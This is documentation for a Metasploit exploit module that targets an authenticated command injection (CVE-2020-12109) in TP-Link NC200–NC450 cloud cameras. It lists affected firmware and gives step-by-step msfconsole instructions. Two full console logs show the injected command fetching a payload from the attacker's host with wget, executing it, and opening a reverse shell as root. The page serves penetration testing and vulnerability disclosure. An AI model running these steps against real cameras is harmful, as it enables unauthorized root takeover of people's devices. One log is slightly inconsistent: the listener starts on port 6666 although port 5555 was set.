## Vulnerable Application

TP-Link cloud cameras NCXXX series (NC200, NC210, NC220, NC230,
NC250, NC260, NC450) are vulnerable to an authenticated command
injection. In all devices except NC210, despite a check on the name
length in `swSystemSetProductAliasCheck`, no other checks are in place
in order to prevent shell metacharacters from being introduced. The
system name would then be used in `swBonjourStartHTTP` as part of a
shell command where arbitrary commands could be injected and
executed as root. NC210 devices cannot be exploited directly via
`/setsysname.cgi` due to proper input validation. NC210 devices are
still vulnerable since `swBonjourStartHTTP` did not perform any
validation when reading the alias name from the configuration file.
The configuration file can be written, and code execution can be
achieved by combining this issue with CVE-2020-12110.
This module will therefore support the following TP-Link cameras:

-NC200 <= 2.1.9 build 200225

-NC220 <= 1.3.0 build 200304

-NC230 <= 1.3.0 build 200304

-NC250 <= 1.3.0 build 200304

-NC260 <= 1.5.2 build 200304

-NC450 <= 1.5.3 build 200304

## Verification Steps

-Turn your camera on and make sure you can connect to its web interface.

-Take note of the camera model, ip address, web interface port and credentials.

-Once that is done, open msfconsole and execute the following commands:

1. `use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection`
2. `set rhost [camera ip]`
3. `set rport [camera web interface port, e.g. 80 or 443]`
4. `set target [ 0 for NC200, NC220, NC230, NC250 | 1 for NC260, NC450]`
5. `set username [web interface username]`
6. `set password [corresponding password]`
7. `set payload [payload of choice, e.g. linux/mipsle/shell/reverse_tcp]`
8. `set lhost [host ip where our reverse shell is listening]`
9. `set lport [port to listen for incoming shell]`
10. `exploit`

You should get a shell.

## Options
### USERNAME

The web interface username

### PASSWORD

The web interface password for the specified username

## Scenarios

Target = 0 (TP-Link NC200, NC220, NC230, NC250)

```
msf5 > use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection
[*] No payload configured, defaulting to linux/mipsle/meterpreter/reverse_tcp
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rhost 192.168.0.1
rhost => 192.168.0.1
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rport 80
rport => 80
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set target 0
target => 0
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set username admin
username => admin
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set password password
password => password
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set payload linux/mipsle/shell/reverse_tcp 
payload => linux/mipsle/shell/reverse_tcp
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lhost 192.168.0.254
lhost => 192.168.0.254
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lport 5555
lport => 5555
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit

[*] Started reverse TCP handler on 192.168.0.254:6666 
[*] Authenticating with admin:YWRtaW4= ...
[+] Logged-in as admin
[+] Got cookie: t46af69kmher6f9
[+] Got token: g3cgt74qi0li8rd
[*] Using URL: http://0.0.0.0:8080/UzN4UMl7PF9
[*] Local IP: http://10.0.2.15:8080/UzN4UMl7PF9
[*] Executing command: wget -qO /tmp/jxVywWSo http://192.168.0.254:8080/UzN4UMl7PF9;chmod +x /tmp/jxVywWSo;/tmp/jxVywWSo;rm -f /tmp/jxVywWSo
[*] Client 192.168.0.1 (Wget) requested /UzN4UMl7PF9
[*] Sending payload to 192.168.0.1 (Wget)
[*] Sending stage (84 bytes) to 192.168.0.1
[*] Command shell session 3 opened (192.168.0.254:6666 -> 192.168.0.1:60141) at 2020-09-16 18:58:02 -0400
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

```

Target = 1 (TP-Link NC260, NC450)

```
msf5 > use exploit/linux/http/tp_link_ncxxx_bonjour_command_injection
[*] No payload configured, defaulting to linux/mipsle/meterpreter/reverse_tcp
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rhost 192.168.0.1
rhost => 192.168.0.1
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set rport 443
rport => 443
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set target 1
target => 1
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set username admin
username => admin
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set password password
password => password
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set payload linux/mipsle/shell/reverse_tcp 
payload => linux/mipsle/shell/reverse_tcp
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lhost 192.168.0.254
lhost => 192.168.0.254
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > set lport 5555
lport => 5555
msf5 exploit(linux/http/tp_link_ncxxx_bonjour_command_injection) > exploit

[*] Started reverse TCP handler on 192.168.0.254:5555 
[*] Authenticating with admin:0b8b946432f1ac91f0b07bd5f8df6587 ...
[+] Logged-in as admin
[+] Got cookie: s8ee6m830juadua
[+] Got token: kad9grok1ap37li
[*] Using URL: http://0.0.0.0:8080/Le4r7p9x
[*] Local IP: http://10.0.2.15:8080/Le4r7p9x
[*] Executing command: wget -qO /tmp/MzczOZUl http://192.168.0.254:8080/Le4r7p9x;chmod +x /tmp/MzczOZUl;/tmp/MzczOZUl;rm -f /tmp/MzczOZUl
[*] Client 192.168.0.1 (Wget/1.13.4 (linux-gnu)) requested /Le4r7p9x
[*] Sending payload to 192.168.0.1 (Wget/1.13.4 (linux-gnu))
[*] Sending stage (84 bytes) to 192.168.0.1
[*] Command shell session 3 opened (192.168.0.254:5555 -> 192.168.0.1:40216) at 2020-09-16 19:00:34 -0400
[*] Command Stager progress - 100.00% done (109/109 bytes)
[*] Server stopped.
```

### References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12109

https://nvd.nist.gov/vuln/detail/CVE-2020-12109

https://seclists.org/fulldisclosure/2020/May/2
